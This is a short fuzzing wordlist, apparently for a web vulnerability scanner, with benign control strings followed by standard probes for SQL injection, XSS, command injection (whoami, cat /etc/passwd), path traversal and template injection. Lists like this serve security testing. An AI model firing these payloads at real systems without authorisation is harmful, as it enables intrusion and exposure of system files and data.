# --- Benign (基准，进一步精简至 4 条) ---
test_safe_string
hello_world
ok
ready
# --- SQL Injection (Basic & Blind) ---
'
"
' OR 1=1 --
" OR 1=1 --
') OR ('1'='1
' UNION SELECT 1,2,3,4,5 --
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,DATABASE(),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --
' AND sleep(5) --
1' AND 1=1 #
1' AND 1=2 #

# --- XSS (Reflected & Stored) ---
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
'"><script>alert(1)</script>
javascript:alert(1)
<body onload=alert(1)>
<iframe src=javascript:alert(1)></iframe>

# --- Command Injection (Linux & Windows) ---
; whoami
| whoami
& whoami
`whoami`
|| whoami
; cat /etc/passwd
| type C:\Windows\win.ini
& ping -c 1 127.0.0.1

# --- Path Traversal / LFI ---
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\win.ini
/etc/passwd
C:\Windows\win.ini
php://filter/convert.base64-encode/resource=index.php

# --- SSTI (Server Side Template Injection) ---
{{7*7}}
${7*7}
<%= 7*7 %>
{{config}}

# --- Benign (精简结束) ---
